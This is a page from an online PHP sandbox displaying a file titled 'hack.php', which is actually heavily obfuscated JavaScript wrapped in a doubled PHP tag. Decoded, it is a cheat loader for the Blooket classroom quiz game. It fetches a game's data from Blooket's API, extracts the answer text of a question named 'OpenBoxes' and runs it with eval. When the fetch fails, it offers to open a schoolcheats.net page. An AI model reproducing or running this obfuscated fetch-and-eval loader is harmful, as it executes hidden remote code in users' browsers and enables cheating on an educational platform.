hack - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.

Your result can be seen below.

Result of php executing

Full code of hack.php

  1. <?php
  2. <?php
  3. (function (_0x5316d0, _0x30a785) {
  4.     const _0x727af7 = _0x516f, _0x3dafc1 = _0x5316d0();
  5.     while (!![]) {
  6.         try {
  7.             const _0x5e184e = -parseInt(_0x727af7(0x1aa)) / (0x2 * 0xd55 + 0x1 * -0x6ed + -0x13bc) * (-parseInt(_0x727af7(0x199)) / (0xa07 + 0x1ffc + -0x2a01)) + parseInt(_0x727af7(0x188)) / (-0x14bf + -0x29 * -0x83 + -0x39) * (parseInt(_0x727af7(0x183)) / (0x1f5e + 0x579 * -0x1 + -0x109 * 0x19)) + -parseInt(_0x727af7(0x189)) / (-0x2b * -0xc7 + 0x86 * 0x25 + -0x5 * 0xa8e) * (-parseInt(_0x727af7(0x1a3)) / (-0x304 + 0x2645 * -0x1 + 0xf * 0x2c1)) + -parseInt(_0x727af7(0x196)) / (-0x499 + 0x19af + 0x257 * -0x9) * (-parseInt(_0x727af7(0x1a7)) / (-0x943 + 0x23f * 0xc + -0x11a9)) + -parseInt(_0x727af7(0x1a1)) / (0x7 * 0x78 + 0x276 * -0x4 + 0x699) * (-parseInt(_0x727af7(0x197)) / (-0x8 * -0x4c3 + -0x1 * 0x19cd + 0xc41 * -0x1)) + -parseInt(_0x727af7(0x18a)) / (0x59d + -0x5c5 + 0x33) * (parseInt(_0x727af7(0x182)) / (0x1db + 0x39 * -0x7f + -0x3c8 * -0x7)) + -parseInt(_0x727af7(0x190)) / (0x758 * -0x3 + 0xff * 0x13 + 0x328);
  8.             if (_0x5e184e === _0x30a785)
  9.                 break;
  10.             else
  11.                 _0x3dafc1['push'](_0x3dafc1['shift']());
  12.         } catch (_0x5b75c1) {
  13.             _0x3dafc1['push'](_0x3dafc1['shift']());
  14.         }
  15.     }
  16. }(_0x2810, 0x7c9f7 + -0x104f95 + 0x1 * 0x14481e), ((() => {
  17.     const _0x246bda = _0x516f, _0x463103 = {
  18.             'UXjau': function (_0x17cd53, _0x108fc4) {
  19.                 return _0x17cd53 !== _0x108fc4;
  20.             },
  21.             'VBjwb': function (_0x4bb15a, _0x21057e) {
  22.                 return _0x4bb15a(_0x21057e);
  23.             },
  24.             'LwndR': _0x246bda(0x17f) + _0x246bda(0x19d) + _0x246bda(0x180) + _0x246bda(0x193) + _0x246bda(0x19e) + _0x246bda(0x1ab),
  25.             'gWbXq': _0x246bda(0x1ac) + _0x246bda(0x17e) + _0x246bda(0x184) + _0x246bda(0x1a2),
  26.             'JcGMu': _0x246bda(0x19a) + _0x246bda(0x1a4) + _0x246bda(0x19f),
  27.             'fjGai': _0x246bda(0x1a9) + _0x246bda(0x198),
  28.             'hjPHW': function (_0x356feb, _0x21830d) {
  29.                 return _0x356feb + _0x21830d;
  30.             },
  31.             'ZKmYf': _0x246bda(0x18c) + _0x246bda(0x1a5) + _0x246bda(0x194) + _0x246bda(0x186) + '='
  32.         };
  33.     try {
  34.         const _0x241926 = _0x463103[_0x246bda(0x18d)], _0x1396f7 = _0x463103[_0x246bda(0x1a8)];
  35.         _0x463103[_0x246bda(0x19c)](fetch, _0x463103[_0x246bda(0x1a6)](_0x463103[_0x246bda(0x187)], _0x241926))[_0x246bda(0x18e)](_0x4b3df5 => {
  36.             const _0x3e54b8 = _0x246bda;
  37.             if (_0x463103[_0x3e54b8(0x191)](_0x4b3df5[_0x3e54b8(0x18f)], -0x44 + -0xc37 + 0x1e5 * 0x7)) {
  38.                 const _0x8b65a5 = _0x463103[_0x3e54b8(0x19c)](confirm, _0x463103[_0x3e54b8(0x18b)]);
  39.                 _0x8b65a5 && window[_0x3e54b8(0x195)](_0x463103[_0x3e54b8(0x1a0)]);
  40.                 return;
  41.             }
  42.             return _0x4b3df5[_0x3e54b8(0x185)]();
  43.         })[_0x246bda(0x18e)](_0x134095 => {
  44.             const _0x1c387b = _0x246bda;
  45.             _0x463103[_0x1c387b(0x19c)](eval, _0x134095[_0x1c387b(0x19b)][_0x1c387b(0x17d)](_0x2d697c => _0x2d697c[_0x1c387b(0x181)] == _0x1396f7)[0x238d * -0x1 + 0xdc3 + 0x2 * 0xae5][_0x1c387b(0x192)][-0x2144 + -0x929 + -0x2a6d * -0x1]);
  46.         });
  47.     } catch (_0x3e1656) {
  48.         const _0x12c292 = _0x463103[_0x246bda(0x19c)](confirm, _0x463103[_0x246bda(0x18b)]);
  49.         if (_0x12c292)
  50.             return window[_0x246bda(0x195)](_0x463103[_0x246bda(0x1a0)]);
  51.     }
  52. })()));
  53. function _0x516f(_0x242785, _0x448eaa) {
  54.     const _0x35d73a = _0x2810();
  55.     return _0x516f = function (_0x138bf5, _0x4a28e6) {
  56.         _0x138bf5 = _0x138bf5 - (0x1e61 + 0x100 * -0x23 + 0x61c);
  57.         let _0x572f35 = _0x35d73a[_0x138bf5];
  58.         return _0x572f35;
  59.     }, _0x516f(_0x242785, _0x448eaa);
  60. }
  61. function _0x2810() {
  62.     const _0x5396b5 = [
  63.         '51e5',
  64.         'gWbXq',
  65.         '72SgIAjr',
  66.         'et/',
  67.         '210CZZdoe',
  68.         '4a330b5570',
  69.         'i.blooket.',
  70.         'hjPHW',
  71.         '18728FDoTyY',
  72.         'fjGai',
  73.         'globalSpam',
  74.         '153371OGdhDQ',
  75.         '\x20version?',
  76.         'https://sc',
  77.         'filter',
  78.         'hoolcheats',
  79.         'Script\x20is\x20',
  80.         'Do\x20you\x20wan',
  81.         'question',
  82.         '250968zBEvXW',
  83.         '16348ThIFot',
  84.         '.net/blook',
  85.         'json',
  86.         'mes?gameId',
  87.         'ZKmYf',
  88.         '123jFiEoo',
  89.         '21500OnZusK',
  90.         '121mOCRaR',
  91.         'LwndR',
  92.         'https://ap',
  93.         'JcGMu',
  94.         'then',
  95.         'status',
  96.         '21410441JXwITY',
  97.         'UXjau',
  98.         'answers',
  99.         't\x20to\x20get\x20t',
  100.         'com/api/ga',
  101.         'open',
  102.         '2009lZiamI',
  103.         '730210YQLkIL',
  104.         'OpenBoxes',
  105.         '14GixFkA',
  106.         '61ac5b3fe4',
  107.         'questions',
  108.         'VBjwb',
  109.         'outdated.\x20',
  110.         'he\x20updated'
  111.     ];
  112.     _0x2810 = function () {
  113.         return _0x5396b5;
  114.     };
  115.     return _0x2810();
  116. }
File Description
  • hack
  • PHP Code
  • 12 May-2023
  • 4.8 Kb
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